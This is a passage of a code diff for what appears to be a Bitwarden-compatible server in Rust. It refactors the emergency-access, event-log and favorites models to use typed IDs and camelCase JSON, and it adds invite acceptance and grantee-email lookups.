let grantor_user = User::find_by_uuid(&self.grantor_uuid, conn).await.expect("Grantor user not found.");
|
||||||
|
|
||||||
json!({
|
json!({
|
||||||
"Id": self.uuid,
|
"id": self.uuid,
|
||||||
"Status": self.status,
|
"status": self.status,
|
||||||
"Type": self.atype,
|
"type": self.atype,
|
||||||
"WaitTimeDays": self.wait_time_days,
|
"waitTimeDays": self.wait_time_days,
|
||||||
"GrantorId": grantor_user.uuid,
|
"grantorId": grantor_user.uuid,
|
||||||
"Email": grantor_user.email,
|
"email": grantor_user.email,
|
||||||
"Name": grantor_user.name,
|
"name": grantor_user.name,
|
||||||
"Object": "emergencyAccessGrantorDetails",
|
"avatarColor": grantor_user.avatar_color,
|
||||||
|
"object": "emergencyAccessGrantorDetails",
|
||||||
})
|
})
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn to_json_grantee_details(&self, conn: &mut DbConn) -> Value {
|
pub async fn to_json_grantee_details(&self, conn: &mut DbConn) -> Option<Value> {
|
||||||
let grantee_user = if let Some(grantee_uuid) = self.grantee_uuid.as_deref() {
|
let grantee_user = if let Some(grantee_uuid) = &self.grantee_uuid {
|
||||||
Some(User::find_by_uuid(grantee_uuid, conn).await.expect("Grantee user not found."))
|
User::find_by_uuid(grantee_uuid, conn).await.expect("Grantee user not found.")
|
||||||
} else if let Some(email) = self.email.as_deref() {
|
} else if let Some(email) = self.email.as_deref() {
|
||||||
Some(User::find_by_mail(email, conn).await.expect("Grantee user not found."))
|
match User::find_by_mail(email, conn).await {
|
||||||
|
Some(user) => user,
|
||||||
|
None => {
|
||||||
|
// remove outstanding invitations which should not exist
|
||||||
|
Self::delete_all_by_grantee_email(email, conn).await.ok();
|
||||||
|
return None;
|
||||||
|
}
|
||||||
|
}
|
||||||
} else {
|
} else {
|
||||||
None
|
return None;
|
||||||
};
|
};
|
||||||
|
|
||||||
json!({
|
Some(json!({
|
||||||
"Id": self.uuid,
|
"id": self.uuid,
|
||||||
"Status": self.status,
|
"status": self.status,
|
||||||
"Type": self.atype,
|
"type": self.atype,
|
||||||
"WaitTimeDays": self.wait_time_days,
|
"waitTimeDays": self.wait_time_days,
|
||||||
"GranteeId": grantee_user.as_ref().map_or("", |u| &u.uuid),
|
"granteeId": grantee_user.uuid,
|
||||||
"Email": grantee_user.as_ref().map_or("", |u| &u.email),
|
"email": grantee_user.email,
|
||||||
"Name": grantee_user.as_ref().map_or("", |u| &u.name),
|
"name": grantee_user.name,
|
||||||
"Object": "emergencyAccessGranteeDetails",
|
"avatarColor": grantee_user.avatar_color,
|
||||||
})
|
"object": "emergencyAccessGranteeDetails",
|
||||||
|
}))
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -174,7 +184,7 @@ impl EmergencyAccess {
|
|||||||
// Update the grantee so that it will refresh it's status.
|
// Update the grantee so that it will refresh it's status.
|
||||||
User::update_uuid_revision(self.grantee_uuid.as_ref().expect("Error getting grantee"), conn).await;
|
User::update_uuid_revision(self.grantee_uuid.as_ref().expect("Error getting grantee"), conn).await;
|
||||||
self.status = status;
|
self.status = status;
|
||||||
self.updated_at = date.to_owned();
|
date.clone_into(&mut self.updated_at);
|
||||||
|
|
||||||
db_run! {conn: {
|
db_run! {conn: {
|
||||||
crate::util::retry(|| {
|
crate::util::retry(|| {
|
||||||
@@ -192,7 +202,7 @@ impl EmergencyAccess {
|
|||||||
conn: &mut DbConn,
|
conn: &mut DbConn,
|
||||||
) -> EmptyResult {
|
) -> EmptyResult {
|
||||||
self.last_notification_at = Some(date.to_owned());
|
self.last_notification_at = Some(date.to_owned());
|
||||||
self.updated_at = date.to_owned();
|
date.clone_into(&mut self.updated_at);
|
||||||
|
|
||||||
db_run! {conn: {
|
db_run! {conn: {
|
||||||
crate::util::retry(|| {
|
crate::util::retry(|| {
|
||||||
@@ -204,7 +214,7 @@ impl EmergencyAccess {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn delete_all_by_user(user_uuid: &str, conn: &mut DbConn) -> EmptyResult {
|
pub async fn delete_all_by_user(user_uuid: &UserId, conn: &mut DbConn) -> EmptyResult {
|
||||||
for ea in Self::find_all_by_grantor_uuid(user_uuid, conn).await {
|
for ea in Self::find_all_by_grantor_uuid(user_uuid, conn).await {
|
||||||
ea.delete(conn).await?;
|
ea.delete(conn).await?;
|
||||||
}
|
}
|
||||||
@@ -214,6 +224,13 @@ impl EmergencyAccess {
|
|||||||
Ok(())
|
Ok(())
|
||||||
}
|
}
|
||||||
|
|
||||||
|
pub async fn delete_all_by_grantee_email(grantee_email: &str, conn: &mut DbConn) -> EmptyResult {
|
||||||
|
for ea in Self::find_all_invited_by_grantee_email(grantee_email, conn).await {
|
||||||
|
ea.delete(conn).await?;
|
||||||
|
}
|
||||||
|
Ok(())
|
||||||
|
}
|
||||||
|
|
||||||
pub async fn delete(self, conn: &mut DbConn) -> EmptyResult {
|
pub async fn delete(self, conn: &mut DbConn) -> EmptyResult {
|
||||||
User::update_uuid_revision(&self.grantor_uuid, conn).await;
|
User::update_uuid_revision(&self.grantor_uuid, conn).await;
|
||||||
|
|
||||||
@@ -224,18 +241,9 @@ impl EmergencyAccess {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_uuid(uuid: &str, conn: &mut DbConn) -> Option<Self> {
|
|
||||||
db_run! { conn: {
|
|
||||||
emergency_access::table
|
|
||||||
.filter(emergency_access::uuid.eq(uuid))
|
|
||||||
.first::<EmergencyAccessDb>(conn)
|
|
||||||
.ok().from_db()
|
|
||||||
}}
|
|
||||||
}
|
|
||||||
|
|
||||||
pub async fn find_by_grantor_uuid_and_grantee_uuid_or_email(
|
pub async fn find_by_grantor_uuid_and_grantee_uuid_or_email(
|
||||||
grantor_uuid: &str,
|
grantor_uuid: &UserId,
|
||||||
grantee_uuid: &str,
|
grantee_uuid: &UserId,
|
||||||
email: &str,
|
email: &str,
|
||||||
conn: &mut DbConn,
|
conn: &mut DbConn,
|
||||||
) -> Option<Self> {
|
) -> Option<Self> {
|
||||||
@@ -257,7 +265,11 @@ impl EmergencyAccess {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_uuid_and_grantor_uuid(uuid: &str, grantor_uuid: &str, conn: &mut DbConn) -> Option<Self> {
|
pub async fn find_by_uuid_and_grantor_uuid(
|
||||||
|
uuid: &EmergencyAccessId,
|
||||||
|
grantor_uuid: &UserId,
|
||||||
|
conn: &mut DbConn,
|
||||||
|
) -> Option<Self> {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
emergency_access::table
|
emergency_access::table
|
||||||
.filter(emergency_access::uuid.eq(uuid))
|
.filter(emergency_access::uuid.eq(uuid))
|
||||||
@@ -267,7 +279,35 @@ impl EmergencyAccess {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_all_by_grantee_uuid(grantee_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
|
pub async fn find_by_uuid_and_grantee_uuid(
|
||||||
|
uuid: &EmergencyAccessId,
|
||||||
|
grantee_uuid: &UserId,
|
||||||
|
conn: &mut DbConn,
|
||||||
|
) -> Option<Self> {
|
||||||
|
db_run! { conn: {
|
||||||
|
emergency_access::table
|
||||||
|
.filter(emergency_access::uuid.eq(uuid))
|
||||||
|
.filter(emergency_access::grantee_uuid.eq(grantee_uuid))
|
||||||
|
.first::<EmergencyAccessDb>(conn)
|
||||||
|
.ok().from_db()
|
||||||
|
}}
|
||||||
|
}
|
||||||
|
|
||||||
|
pub async fn find_by_uuid_and_grantee_email(
|
||||||
|
uuid: &EmergencyAccessId,
|
||||||
|
grantee_email: &str,
|
||||||
|
conn: &mut DbConn,
|
||||||
|
) -> Option<Self> {
|
||||||
|
db_run! { conn: {
|
||||||
|
emergency_access::table
|
||||||
|
.filter(emergency_access::uuid.eq(uuid))
|
||||||
|
.filter(emergency_access::email.eq(grantee_email))
|
||||||
|
.first::<EmergencyAccessDb>(conn)
|
||||||
|
.ok().from_db()
|
||||||
|
}}
|
||||||
|
}
|
||||||
|
|
||||||
|
pub async fn find_all_by_grantee_uuid(grantee_uuid: &UserId, conn: &mut DbConn) -> Vec<Self> {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
emergency_access::table
|
emergency_access::table
|
||||||
.filter(emergency_access::grantee_uuid.eq(grantee_uuid))
|
.filter(emergency_access::grantee_uuid.eq(grantee_uuid))
|
||||||
@@ -285,13 +325,60 @@ impl EmergencyAccess {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_all_by_grantor_uuid(grantor_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
|
pub async fn find_all_invited_by_grantee_email(grantee_email: &str, conn: &mut DbConn) -> Vec<Self> {
|
||||||
|
db_run! { conn: {
|
||||||
|
emergency_access::table
|
||||||
|
.filter(emergency_access::email.eq(grantee_email))
|
||||||
|
.filter(emergency_access::status.eq(EmergencyAccessStatus::Invited as i32))
|
||||||
|
.load::<EmergencyAccessDb>(conn).expect("Error loading emergency_access").from_db()
|
||||||
|
}}
|
||||||
|
}
|
||||||
|
|
||||||
|
pub async fn find_all_by_grantor_uuid(grantor_uuid: &UserId, conn: &mut DbConn) -> Vec<Self> {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
emergency_access::table
|
emergency_access::table
|
||||||
.filter(emergency_access::grantor_uuid.eq(grantor_uuid))
|
.filter(emergency_access::grantor_uuid.eq(grantor_uuid))
|
||||||
.load::<EmergencyAccessDb>(conn).expect("Error loading emergency_access").from_db()
|
.load::<EmergencyAccessDb>(conn).expect("Error loading emergency_access").from_db()
|
||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
pub async fn accept_invite(
|
||||||
|
&mut self,
|
||||||
|
grantee_uuid: &UserId,
|
||||||
|
grantee_email: &str,
|
||||||
|
conn: &mut DbConn,
|
||||||
|
) -> EmptyResult {
|
||||||
|
if self.email.is_none() || self.email.as_ref().unwrap() != grantee_email {
|
||||||
|
err!("User email does not match invite.");
|
||||||
|
}
|
||||||
|
|
||||||
|
if self.status == EmergencyAccessStatus::Accepted as i32 {
|
||||||
|
err!("Emergency contact already accepted.");
|
||||||
|
}
|
||||||
|
|
||||||
|
self.status = EmergencyAccessStatus::Accepted as i32;
|
||||||
|
self.grantee_uuid = Some(grantee_uuid.clone());
|
||||||
|
self.email = None;
|
||||||
|
self.save(conn).await
|
||||||
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
// endregion
|
// endregion
|
||||||
|
|
||||||
|
#[derive(
|
||||||
|
Clone,
|
||||||
|
Debug,
|
||||||
|
AsRef,
|
||||||
|
Deref,
|
||||||
|
DieselNewType,
|
||||||
|
Display,
|
||||||
|
From,
|
||||||
|
FromForm,
|
||||||
|
Hash,
|
||||||
|
PartialEq,
|
||||||
|
Eq,
|
||||||
|
Serialize,
|
||||||
|
Deserialize,
|
||||||
|
UuidFromParam,
|
||||||
|
)]
|
||||||
|
pub struct EmergencyAccessId(String);
|
||||||
|
|||||||
@@ -1,41 +1,42 @@
|
|||||||
use crate::db::DbConn;
|
use chrono::{NaiveDateTime, TimeDelta, Utc};
|
||||||
|
//use derive_more::{AsRef, Deref, Display, From};
|
||||||
use serde_json::Value;
|
use serde_json::Value;
|
||||||
|
|
||||||
use crate::{api::EmptyResult, error::MapResult, CONFIG};
|
use super::{CipherId, CollectionId, GroupId, MembershipId, OrgPolicyId, OrganizationId, UserId};
|
||||||
|
use crate::{api::EmptyResult, db::DbConn, error::MapResult, CONFIG};
|
||||||
use chrono::{Duration, NaiveDateTime, Utc};
|
|
||||||
|
|
||||||
// https://bitwarden.com/help/event-logs/
|
// https://bitwarden.com/help/event-logs/
|
||||||
|
|
||||||
db_object! {
|
db_object! {
|
||||||
// Upstream: https://github.com/bitwarden/server/blob/8a22c0479e987e756ce7412c48a732f9002f0a2d/src/Core/Services/Implementations/EventService.cs
|
// Upstream: https://github.com/bitwarden/server/blob/9ebe16587175b1c0e9208f84397bb75d0d595510/src/Core/AdminConsole/Services/Implementations/EventService.cs
|
||||||
// Upstream: https://github.com/bitwarden/server/blob/8a22c0479e987e756ce7412c48a732f9002f0a2d/src/Api/Models/Public/Response/EventResponseModel.cs
|
// Upstream: https://github.com/bitwarden/server/blob/9ebe16587175b1c0e9208f84397bb75d0d595510/src/Api/AdminConsole/Public/Models/Response/EventResponseModel.cs
|
||||||
// Upstream SQL: https://github.com/bitwarden/server/blob/8a22c0479e987e756ce7412c48a732f9002f0a2d/src/Sql/dbo/Tables/Event.sql
|
// Upstream SQL: https://github.com/bitwarden/server/blob/9ebe16587175b1c0e9208f84397bb75d0d595510/src/Sql/dbo/Tables/Event.sql
|
||||||
#[derive(Identifiable, Queryable, Insertable, AsChangeset)]
|
#[derive(Identifiable, Queryable, Insertable, AsChangeset)]
|
||||||
#[diesel(table_name = event)]
|
#[diesel(table_name = event)]
|
||||||
|
#[diesel(treat_none_as_null = true)]
|
||||||
#[diesel(primary_key(uuid))]
|
#[diesel(primary_key(uuid))]
|
||||||
pub struct Event {
|
pub struct Event {
|
||||||
pub uuid: String,
|
pub uuid: EventId,
|
||||||
pub event_type: i32, // EventType
|
pub event_type: i32, // EventType
|
||||||
pub user_uuid: Option<String>,
|
pub user_uuid: Option<UserId>,
|
||||||
pub org_uuid: Option<String>,
|
pub org_uuid: Option<OrganizationId>,
|
||||||
pub cipher_uuid: Option<String>,
|
pub cipher_uuid: Option<CipherId>,
|
||||||
pub collection_uuid: Option<String>,
|
pub collection_uuid: Option<CollectionId>,
|
||||||
pub group_uuid: Option<String>,
|
pub group_uuid: Option<GroupId>,
|
||||||
pub org_user_uuid: Option<String>,
|
pub org_user_uuid: Option<MembershipId>,
|
||||||
pub act_user_uuid: Option<String>,
|
pub act_user_uuid: Option<UserId>,
|
||||||
// Upstream enum: https://github.com/bitwarden/server/blob/8a22c0479e987e756ce7412c48a732f9002f0a2d/src/Core/Enums/DeviceType.cs
|
// Upstream enum: https://github.com/bitwarden/server/blob/9ebe16587175b1c0e9208f84397bb75d0d595510/src/Core/Enums/DeviceType.cs
|
||||||
pub device_type: Option<i32>,
|
pub device_type: Option<i32>,
|
||||||
pub ip_address: Option<String>,
|
pub ip_address: Option<String>,
|
||||||
pub event_date: NaiveDateTime,
|
pub event_date: NaiveDateTime,
|
||||||
pub policy_uuid: Option<String>,
|
pub policy_uuid: Option<OrgPolicyId>,
|
||||||
pub provider_uuid: Option<String>,
|
pub provider_uuid: Option<String>,
|
||||||
pub provider_user_uuid: Option<String>,
|
pub provider_user_uuid: Option<String>,
|
||||||
pub provider_org_uuid: Option<String>,
|
pub provider_org_uuid: Option<String>,
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
// Upstream enum: https://github.com/bitwarden/server/blob/8a22c0479e987e756ce7412c48a732f9002f0a2d/src/Core/Enums/EventType.cs
|
// Upstream enum: https://github.com/bitwarden/server/blob/9ebe16587175b1c0e9208f84397bb75d0d595510/src/Core/AdminConsole/Enums/EventType.cs
|
||||||
#[derive(Debug, Copy, Clone)]
|
#[derive(Debug, Copy, Clone)]
|
||||||
pub enum EventType {
|
pub enum EventType {
|
||||||
// User
|
// User
|
||||||
@@ -49,6 +50,8 @@ pub enum EventType {
|
|||||||
UserClientExportedVault = 1007,
|
UserClientExportedVault = 1007,
|
||||||
// UserUpdatedTempPassword = 1008, // Not supported
|
// UserUpdatedTempPassword = 1008, // Not supported
|
||||||
// UserMigratedKeyToKeyConnector = 1009, // Not supported
|
// UserMigratedKeyToKeyConnector = 1009, // Not supported
|
||||||
|
UserRequestedDeviceApproval = 1010,
|
||||||
|
// UserTdeOffboardingPasswordSet = 1011, // Not supported
|
||||||
|
|
||||||
// Cipher
|
// Cipher
|
||||||
CipherCreated = 1100,
|
CipherCreated = 1100,
|
||||||
@@ -84,7 +87,7 @@ pub enum EventType {
|
|||||||
OrganizationUserInvited = 1500,
|
OrganizationUserInvited = 1500,
|
||||||
OrganizationUserConfirmed = 1501,
|
OrganizationUserConfirmed = 1501,
|
||||||
OrganizationUserUpdated = 1502,
|
OrganizationUserUpdated = 1502,
|
||||||
OrganizationUserRemoved = 1503,
|
OrganizationUserRemoved = 1503, // Organization user data was deleted
|
||||||
OrganizationUserUpdatedGroups = 1504,
|
OrganizationUserUpdatedGroups = 1504,
|
||||||
// OrganizationUserUnlinkedSso = 1505, // Not supported
|
// OrganizationUserUnlinkedSso = 1505, // Not supported
|
||||||
OrganizationUserResetPasswordEnroll = 1506,
|
OrganizationUserResetPasswordEnroll = 1506,
|
||||||
@@ -94,6 +97,10 @@ pub enum EventType {
|
|||||||
// OrganizationUserFirstSsoLogin = 1510, // Not supported
|
// OrganizationUserFirstSsoLogin = 1510, // Not supported
|
||||||
OrganizationUserRevoked = 1511,
|
OrganizationUserRevoked = 1511,
|
||||||
OrganizationUserRestored = 1512,
|
OrganizationUserRestored = 1512,
|
||||||
|
OrganizationUserApprovedAuthRequest = 1513,
|
||||||
|
OrganizationUserRejectedAuthRequest = 1514,
|
||||||
|
OrganizationUserDeleted = 1515, // Both user and organization user data were deleted
|
||||||
|
OrganizationUserLeft = 1516, // User voluntarily left the organization
|
||||||
|
|
||||||
// Organization
|
// Organization
|
||||||
OrganizationUpdated = 1600,
|
OrganizationUpdated = 1600,
|
||||||
@@ -105,6 +112,7 @@ pub enum EventType {
|
|||||||
// OrganizationEnabledKeyConnector = 1606, // Not supported
|
// OrganizationEnabledKeyConnector = 1606, // Not supported
|
||||||
// OrganizationDisabledKeyConnector = 1607, // Not supported
|
// OrganizationDisabledKeyConnector = 1607, // Not supported
|
||||||
// OrganizationSponsorshipsSynced = 1608, // Not supported
|
// OrganizationSponsorshipsSynced = 1608, // Not supported
|
||||||
|
// OrganizationCollectionManagementUpdated = 1609, // Not supported
|
||||||
|
|
||||||
// Policy
|
// Policy
|
||||||
PolicyUpdated = 1700,
|
PolicyUpdated = 1700,
|
||||||
@@ -117,6 +125,13 @@ pub enum EventType {
|
|||||||
// ProviderOrganizationAdded = 1901, // Not supported
|
// ProviderOrganizationAdded = 1901, // Not supported
|
||||||
// ProviderOrganizationRemoved = 1902, // Not supported
|
// ProviderOrganizationRemoved = 1902, // Not supported
|
||||||
// ProviderOrganizationVaultAccessed = 1903, // Not supported
|
// ProviderOrganizationVaultAccessed = 1903, // Not supported
|
||||||
|
|
||||||
|
// OrganizationDomainAdded = 2000, // Not supported
|
||||||
|
// OrganizationDomainRemoved = 2001, // Not supported
|
||||||
|
// OrganizationDomainVerified = 2002, // Not supported
|
||||||
|
// OrganizationDomainNotVerified = 2003, // Not supported
|
||||||
|
|
||||||
|
// SecretRetrieved = 2100, // Not supported
|
||||||
}
|
}
|
||||||
|
|
||||||
/// Local methods
|
/// Local methods
|
||||||
@@ -128,7 +143,7 @@ impl Event {
|
|||||||
};
|
};
|
||||||
|
|
||||||
Self {
|
Self {
|
||||||
uuid: crate::util::get_uuid(),
|
uuid: EventId(crate::util::get_uuid()),
|
||||||
event_type,
|
event_type,
|
||||||
user_uuid: None,
|
user_uuid: None,
|
||||||
org_uuid: None,
|
org_uuid: None,
|
||||||
@@ -172,7 +187,7 @@ impl Event {
|
|||||||
}
|
}
|
||||||
|
|
||||||
/// Database methods
|
/// Database methods
|
||||||
/// https://github.com/bitwarden/server/blob/8a22c0479e987e756ce7412c48a732f9002f0a2d/src/Core/Services/Implementations/EventService.cs
|
/// https://github.com/bitwarden/server/blob/9ebe16587175b1c0e9208f84397bb75d0d595510/src/Core/AdminConsole/Services/Implementations/EventService.cs
|
||||||
impl Event {
|
impl Event {
|
||||||
pub const PAGE_SIZE: i64 = 30;
|
pub const PAGE_SIZE: i64 = 30;
|
||||||
|
|
||||||
@@ -246,7 +261,7 @@ impl Event {
|
|||||||
/// ##############
|
/// ##############
|
||||||
/// Custom Queries
|
/// Custom Queries
|
||||||
pub async fn find_by_organization_uuid(
|
pub async fn find_by_organization_uuid(
|
||||||
org_uuid: &str,
|
org_uuid: &OrganizationId,
|
||||||
start: &NaiveDateTime,
|
start: &NaiveDateTime,
|
||||||
end: &NaiveDateTime,
|
end: &NaiveDateTime,
|
||||||
conn: &mut DbConn,
|
conn: &mut DbConn,
|
||||||
@@ -263,7 +278,7 @@ impl Event {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn count_by_org(org_uuid: &str, conn: &mut DbConn) -> i64 {
|
pub async fn count_by_org(org_uuid: &OrganizationId, conn: &mut DbConn) -> i64 {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
event::table
|
event::table
|
||||||
.filter(event::org_uuid.eq(org_uuid))
|
.filter(event::org_uuid.eq(org_uuid))
|
||||||
@@ -274,16 +289,16 @@ impl Event {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_org_and_user_org(
|
pub async fn find_by_org_and_member(
|
||||||
org_uuid: &str,
|
org_uuid: &OrganizationId,
|
||||||
user_org_uuid: &str,
|
member_uuid: &MembershipId,
|
||||||
start: &NaiveDateTime,
|
start: &NaiveDateTime,
|
||||||
end: &NaiveDateTime,
|
end: &NaiveDateTime,
|
||||||
conn: &mut DbConn,
|
conn: &mut DbConn,
|
||||||
) -> Vec<Self> {
|
) -> Vec<Self> {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
event::table
|
event::table
|
||||||
.inner_join(users_organizations::table.on(users_organizations::uuid.eq(user_org_uuid)))
|
.inner_join(users_organizations::table.on(users_organizations::uuid.eq(member_uuid)))
|
||||||
.filter(event::org_uuid.eq(org_uuid))
|
.filter(event::org_uuid.eq(org_uuid))
|
||||||
.filter(event::event_date.between(start, end))
|
.filter(event::event_date.between(start, end))
|
||||||
.filter(event::user_uuid.eq(users_organizations::user_uuid.nullable()).or(event::act_user_uuid.eq(users_organizations::user_uuid.nullable())))
|
.filter(event::user_uuid.eq(users_organizations::user_uuid.nullable()).or(event::act_user_uuid.eq(users_organizations::user_uuid.nullable())))
|
||||||
@@ -297,7 +312,7 @@ impl Event {
|
|||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_cipher_uuid(
|
pub async fn find_by_cipher_uuid(
|
||||||
cipher_uuid: &str,
|
cipher_uuid: &CipherId,
|
||||||
start: &NaiveDateTime,
|
start: &NaiveDateTime,
|
||||||
end: &NaiveDateTime,
|
end: &NaiveDateTime,
|
||||||
conn: &mut DbConn,
|
conn: &mut DbConn,
|
||||||
@@ -316,7 +331,7 @@ impl Event {
|
|||||||
|
|
||||||
pub async fn clean_events(conn: &mut DbConn) -> EmptyResult {
|
pub async fn clean_events(conn: &mut DbConn) -> EmptyResult {
|
||||||
if let Some(days_to_retain) = CONFIG.events_days_retain() {
|
if let Some(days_to_retain) = CONFIG.events_days_retain() {
|
||||||
let dt = Utc::now().naive_utc() - Duration::days(days_to_retain);
|
let dt = Utc::now().naive_utc() - TimeDelta::try_days(days_to_retain).unwrap();
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
diesel::delete(event::table.filter(event::event_date.lt(dt)))
|
diesel::delete(event::table.filter(event::event_date.lt(dt)))
|
||||||
.execute(conn)
|
.execute(conn)
|
||||||
@@ -327,3 +342,6 @@ impl Event {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
#[derive(Clone, Debug, DieselNewType, FromForm, Hash, PartialEq, Eq, Serialize, Deserialize)]
|
||||||
|
pub struct EventId(String);
|
||||||
|
|||||||
@@ -1,12 +1,12 @@
|
|||||||
use super::User;
|
use super::{CipherId, User, UserId};
|
||||||
|
|
||||||
db_object! {
|
db_object! {
|
||||||
#[derive(Identifiable, Queryable, Insertable)]
|
#[derive(Identifiable, Queryable, Insertable)]
|
||||||
#[diesel(table_name = favorites)]
|
#[diesel(table_name = favorites)]
|
||||||
#[diesel(primary_key(user_uuid, cipher_uuid))]
|
#[diesel(primary_key(user_uuid, cipher_uuid))]
|
||||||
pub struct Favorite {
|
pub struct Favorite {
|
||||||
pub user_uuid: String,
|
pub user_uuid: UserId,
|
||||||
pub cipher_uuid: String,
|
pub cipher_uuid: CipherId,
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -17,7 +17,7 @@ use crate::error::MapResult;
|
|||||||
|
|
||||||
impl Favorite {
|
impl Favorite {
|
||||||
// Returns whether the specified cipher is a favorite of the specified user.
|
// Returns whether the specified cipher is a favorite of the specified user.
|
||||||
pub async fn is_favorite(cipher_uuid: &str, user_uuid: &str, conn: &mut DbConn) -> bool {
|
pub async fn is_favorite(cipher_uuid: &CipherId, user_uuid: &UserId, conn: &mut DbConn) -> bool {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
let query = favorites::table
|
let query = favorites::table
|
||||||
.filter(favorites::cipher_uuid.eq(cipher_uuid))
|
.filter(favorites::cipher_uuid.eq(cipher_uuid))
|
||||||
@@ -29,7 +29,12 @@ impl Favorite {
|
|||||||
}
|
}
|
||||||
|
|
||||||
// Sets whether the specified cipher is a favorite of the specified user.
|
// Sets whether the specified cipher is a favorite of the specified user.
|
||||||
pub async fn set_favorite(favorite: bool, cipher_uuid: &str, user_uuid: &str, conn: &mut DbConn) -> EmptyResult {
|
pub async fn set_favorite(
|
||||||
|
favorite: bool,
|
||||||
|
cipher_uuid: &CipherId,
|
||||||
|
user_uuid: &UserId,
|
||||||
|
conn: &mut DbConn,
|
||||||
|
) -> EmptyResult {
|
||||||
let (old, new) = (Self::is_favorite(cipher_uuid, user_uuid, conn).await, favorite);
|
let (old, new) = (Self::is_favorite(cipher_uuid, user_uuid, conn).await, favorite);
|
||||||
match (old, new) {
|
match (old, new) {
|
||||||
(false, true) => {
|
(false, true) => {
|
||||||
@@ -62,7 +67,7 @@ impl Favorite {
|
|||||||
}
|
}
|
||||||
|
|
||||||
// Delete all favorite entries associated with the specified cipher.
|
// Delete all favorite entries associated with the specified cipher.
|
||||||
pub async fn delete_all_by_cipher(cipher_uuid: &str, conn: &mut DbConn) -> EmptyResult {
|
pub async fn delete_all_by_cipher(cipher_uuid: &CipherId, conn: &mut DbConn) -> EmptyResult {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
diesel::delete(favorites::table.filter(favorites::cipher_uuid.eq(cipher_uuid)))
|
diesel::delete(favorites::table.filter(favorites::cipher_uuid.eq(cipher_uuid)))
|
||||||
.execute(conn)
|
.execute(conn)
|
||||||
@@ -71,7 +76,7 @@ impl Favorite {
|
|||||||
}
|
}
|
||||||
|
|
||||||
// Delete all favorite entries associated with the specified user.
|
// Delete all favorite entries associated with the specified user.
|
||||||
pub async fn delete_all_by_user(user_uuid: &str, conn: &mut DbConn) -> EmptyResult {
|
pub async fn delete_all_by_user(user_uuid: &UserId, conn: &mut DbConn) -> EmptyResult {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
diesel::delete(favorites::table.filter(favorites::user_uuid.eq(user_uuid)))
|
diesel::delete(favorites::table.filter(favorites::user_uuid.eq(user_uuid)))
|
||||||
.execute(conn)
|
.execute(conn)
|
||||||
@@ -81,12 +86,12 @@ impl Favorite {
|
|||||||
|
|
||||||
/// Return a vec with (cipher_uuid) this will only contain favorite flagged ciphers
|
/// Return a vec with (cipher_uuid) this will only contain favorite flagged ciphers
|
||||||
/// This is used during a full sync so we only need one query for all favorite cipher matches.
|
/// This is used during a full sync so we only need one query for all favorite cipher matches.
|
||||||
pub async fn get_all_cipher_uuid_by_user(user_uuid: &str, conn: &mut DbConn) -> Vec<String> {
|
pub async fn get_all_cipher_uuid_by_user(user_uuid: &UserId, conn: &mut DbConn) -> Vec<CipherId> {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
favorites::table
|
favorites::table
|
||||||
.filter(favorites::user_uuid.eq(user_uuid))
|
.filter(favorites::user_uuid.eq(user_uuid))
|
||||||
.select(favorites::cipher_uuid)
|
.select(favorites::cipher_uuid)
|
||||||
.load::<String>(conn)
|
.load::<CipherId>(conn)
|
||||||
.unwrap_or_default()
|
.unwrap_or_default()
|
||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -1,17 +1,19 @@
|
|||||||
use chrono::{NaiveDateTime, Utc};
|
use chrono::{NaiveDateTime, Utc};
|
||||||
|
use derive_more::{AsRef, Deref, Display, From};
|
||||||
use serde_json::Value;
|
use serde_json::Value;
|
||||||
|
|
||||||
use super::User;
|
use super::{CipherId, User, UserId};
|
||||||
|
use macros::UuidFromParam;
|
||||||
|
|
||||||
db_object! {
|
db_object! {
|
||||||
#[derive(Identifiable, Queryable, Insertable, AsChangeset)]
|
#[derive(Identifiable, Queryable, Insertable, AsChangeset)]
|
||||||
#[diesel(table_name = folders)]
|
#[diesel(table_name = folders)]
|
||||||
#[diesel(primary_key(uuid))]
|
#[diesel(primary_key(uuid))]
|
||||||
pub struct Folder {
|
pub struct Folder {
|
||||||
pub uuid: String,
|
pub uuid: FolderId,
|
||||||
pub created_at: NaiveDateTime,
|
pub created_at: NaiveDateTime,
|
||||||
pub updated_at: NaiveDateTime,
|
pub updated_at: NaiveDateTime,
|
||||||
pub user_uuid: String,
|
pub user_uuid: UserId,
|
||||||
pub name: String,
|
pub name: String,
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -19,18 +21,18 @@ db_object! {
|
|||||||
#[diesel(table_name = folders_ciphers)]
|
#[diesel(table_name = folders_ciphers)]
|
||||||
#[diesel(primary_key(cipher_uuid, folder_uuid))]
|
